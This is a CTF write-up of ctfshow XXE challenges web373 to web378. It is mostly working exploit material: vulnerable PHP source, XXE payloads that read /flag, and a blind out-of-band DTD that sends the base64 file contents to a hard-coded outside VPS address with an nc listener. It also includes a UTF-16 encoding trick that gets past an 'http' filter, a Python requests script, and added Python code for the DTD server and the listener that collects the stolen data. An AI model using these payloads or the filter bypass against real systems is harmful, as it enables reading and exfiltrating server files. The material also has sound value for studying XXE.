web373
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2021-01-07 12:59:52
# @Last Modified by: h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);
The script only echoes $creds->ctfshow, i.e. the text of the <ctfshow> element, so the entity reference has to sit inside <ctfshow>...</ctfshow>; an entity placed under any other element name is still expanded by the parser but never printed. Entity loading is explicitly re-enabled, LIBXML_NOENT makes libxml substitute entities and LIBXML_DTDLOAD lets it load DTDs, so an external entity such as SYSTEM "file:///flag" declared in the DOCTYPE is resolved and its contents are echoed back.
web374 remote (out-of-band)
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2021-01-07 12:59:52
# @Last Modified by: h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);
Almost the same code as the previous challenge, but nothing is echoed any more: the XXE is blind. The way out is to make the parser load a DTD from a server we control and have that DTD send the file contents back to us out of band. Create a test.dtd on the VPS (it is used for out-of-band exfiltration, not for a reverse shell) with the following contents:
<!ENTITY % dtd "<!ENTITY % xxe SYSTEM 'http://47.236.41.52:1234/%file;'> ">
%dtd;
%xxe;
Listen on port 1234 on the VPS (nc -lvp 1234).
Request body to POST:
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://47.236.41.52/test.dtd">
%aaa;
]>
<root>1</root>
The listener on the VPS receives a GET whose path is the base64 of /flag. The php://filter base64 wrapper is what makes this work: newlines and other characters in the file would otherwise break the SYSTEM URL that %xxe; expands to, while base64 folds the whole file into a single URL-safe token.
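The two VPS roles from the steps above (the web server handing out test.dtd and the listener catching the callback), as an added example that is not part of the writeup. It binds to 127.0.0.1 on an ephemeral port instead of the writeup's VPS address, and since the target's libxml is not available offline, simulate_vulnerable_parser() stands in for it: it fetches the DTD, expands %file; with the base64 of a constructed file, and dereferences %xxe;, exactly the sequence the DOCTYPE above triggers.

```python
import base64
import re
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Files the target's parser delivered to us, decoded. Module-level so the
# handler (instantiated per request by the server) can append to it.
RECEIVED = []


def build_dtd(callback_base):
    """The external DTD the VPS serves (same shape as the writeup's test.dtd).

    The target's request already declared %file; (the file to read, base64
    wrapped so it fits in one URL). %dtd; declares %xxe; with a SYSTEM URL
    that embeds %file;, and %xxe; then dereferences it, so the target's
    libxml issues GET callback_base/<base64 of the file> against us.
    """
    return ('<!ENTITY % dtd "<!ENTITY % xxe SYSTEM \'' + callback_base +
            '/%file;\'>">\n%dtd;\n%xxe;\n')


class ListenerHandler(BaseHTTPRequestHandler):
    """Plays both VPS roles: web server for test.dtd and the nc listener."""

    def do_GET(self):
        if self.path == '/test.dtd':
            host, port = self.server.server_address
            body = build_dtd('http://%s:%d' % (host, port)).encode()
            self.send_response(200)
            self.send_header('Content-Type', 'application/xml-dtd')
            self.send_header('Content-Length', str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        # Any other path is the callback: /<base64 of the file>. Strip only
        # the leading slash, because base64 itself may contain '/'.
        token = self.path[1:]
        try:
            RECEIVED.append(base64.b64decode(token, validate=True)
                            .decode('utf-8', 'replace'))
        except ValueError:
            pass  # not base64 (a stray probe); ignore it
        self.send_response(204)
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the demo quiet; a real listener would print every hit


def start_listener(host='127.0.0.1', port=0):
    """Bind (port 0 = ephemeral) and serve in a background thread."""
    server = HTTPServer((host, port), ListenerHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def listener_base_url(server):
    return 'http://%s:%d' % server.server_address


# Ignore proxy environment variables; the listener is local in this demo.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def simulate_vulnerable_parser(base_url, file_bytes):
    """Stand-in for the target's libxml, which this demo does not run:
    fetch test.dtd (the %aaa; step), expand %file; with the base64 of the
    constructed file, dereference %xxe; (the callback). Returns that URL."""
    dtd = _opener.open(base_url + '/test.dtd', timeout=5).read().decode()
    sys_url = re.search(r"SYSTEM '([^']+)'", dtd).group(1)
    callback = sys_url.replace('%file;', base64.b64encode(file_bytes).decode())
    _opener.open(callback, timeout=5).read()
    return callback


def received_files():
    return list(RECEIVED)


if __name__ == '__main__':
    srv = start_listener()
    base = listener_base_url(srv)
    # Constructed sample file, not the challenge's real flag.
    simulate_vulnerable_parser(base, b'ctfshow{constructed-flag}\n')
    print(received_files())
    srv.shutdown()
```

With a real target, replace the simulated parser with the POST body from above pointing at this host, and read the decoded file from received_files(); the raw GET line that nc shows is the same base64 token this handler decodes.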
web375
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);
The only new thing is this filter:
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}
so the body must not contain <?xml version="1.0". The XML declaration is optional, so simply leave it out; the rest of the web374 payload works unchanged:
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://47.236.41.52/test.dtd">
%aaa;
]>
<root>123</root>
with nc listening on the VPS as before.
web376: same as the previous challenge, same payload.
web377: UTF-16 encoded payload
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);
Now http is filtered as well, case-insensitively, so the previous payload no longer gets through.
To get http past the regex, encode the whole body as UTF-16: preg_match runs on the raw request bytes, where every ASCII character is followed by a null byte and the four bytes "http" never appear contiguously, while libxml sees the byte-order mark, decodes the document as UTF-16 and parses it normally.
Script:
import requests

url = "http://9ee720e9-0a8c-45d3-ae58-3cb03a363de7.challenge.ctf.show/"
# Same blind payload as web374/375: no XML declaration, external DTD on the VPS
payload = """
<!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> <!ENTITY % aaa SYSTEM "http://47.236.41.52/test.dtd"> %aaa; ]> <root>123</root>
"""
head = {"Content-Type": "application/x-www-form-urlencoded"}
# str.encode("utf-16") prepends a BOM; libxml uses it to detect the encoding,
# and the regex never sees an ASCII "http" or "<?xml" in the UTF-16 bytes
r = requests.post(url=url, data=payload.encode("utf-16"), headers=head)
print(r.text)
The base64 of the flag then arrives on the VPS listener, exactly as in web374.
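Why the encoding trick works, and why the web375 payload only needs the declaration dropped, as an added example that is not part of the writeup: a port of the web375/web377 filter run over the raw bytes (as PHP's preg_match does), and a decoder that mirrors the BOM-based encoding sniff the XML parser performs before it ever looks for "http". The payload text and VPS address are the writeup's; nothing is sent anywhere.

```python
import re

# Port of the web377 filter: preg_match sees the raw request body, so this
# runs on bytes, case-insensitively like /.../i. The web375 filter is the
# first alternative alone.
FILTER_377 = re.compile(rb'<\?xml version="1\.0"|http', re.IGNORECASE)
FILTER_375 = re.compile(rb'<\?xml version="1\.0"')

# The writeup's payload: no XML declaration, external DTD on the VPS.
PAYLOAD = ('<!DOCTYPE test [ '
           '<!ENTITY % file SYSTEM '
           '"php://filter/read=convert.base64-encode/resource=/flag"> '
           '<!ENTITY % aaa SYSTEM "http://47.236.41.52/test.dtd"> %aaa; ]> '
           '<root>123</root>')


def filter_blocks(body: bytes, pattern=FILTER_377) -> bool:
    """True if the target's preg_match would die('error') on this body."""
    return pattern.search(body) is not None


def encode_for_bypass(payload: str, little_endian: bool = True) -> bytes:
    """UTF-16 with an explicit byte-order mark.

    str.encode('utf-16') does the same in native byte order; writing the BOM
    by hand pins the endianness. The BOM is essential: with no XML
    declaration and no BOM, the parser assumes UTF-8 and the body is garbage.
    """
    if little_endian:
        return b'\xff\xfe' + payload.encode('utf-16-le')
    return b'\xfe\xff' + payload.encode('utf-16-be')


def parser_view(body: bytes) -> str:
    """What the XML parser works on after encoding detection: BOM sniffing
    for UTF-16, UTF-8 otherwise. This is the stage at which 'http' and the
    DOCTYPE reappear, after the byte-level filter has already passed."""
    if body.startswith(b'\xff\xfe'):
        return body[2:].decode('utf-16-le')
    if body.startswith(b'\xfe\xff'):
        return body[2:].decode('utf-16-be')
    return body.decode('utf-8')


if __name__ == '__main__':
    plain = PAYLOAD.encode('utf-8')
    wide = encode_for_bypass(PAYLOAD)
    print('web375 blocks plain payload:', filter_blocks(plain, FILTER_375))
    print('web377 blocks plain payload:', filter_blocks(plain))
    print('web377 blocks UTF-16 payload:', filter_blocks(wide))
    print('parser still sees the DTD URL:', 'http://' in parser_view(wide))
```

The same check explains the web375 payload: with the declaration removed, FILTER_375 finds nothing even in plain UTF-8, and it is only the added "http" alternative in web377 that forces the move to UTF-16.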
web378
A common lab setup: a login form that posts XML to /doLogin. Captured request:
POST /doLogin HTTP/1.1
Host: 731b50d9-7186-4726-9a37-40d372e37794.challenge.ctf.show
Content-Length: 148
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Content-Type: application/xml;charset=UTF-8
Origin: http://731b50d9-7186-4726-9a37-40d372e37794.challenge.ctf.show
Referer: http://731b50d9-7186-4726-9a37-40d372e37794.challenge.ctf.show/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY f SYSTEM "file:///flag">
]>
<user><username>&f;</username><password>admin</password></user>
Payload to read the flag: &f; expands to the contents of /flag inside <username>, and the login response reflects the username, so the flag comes back in the reply.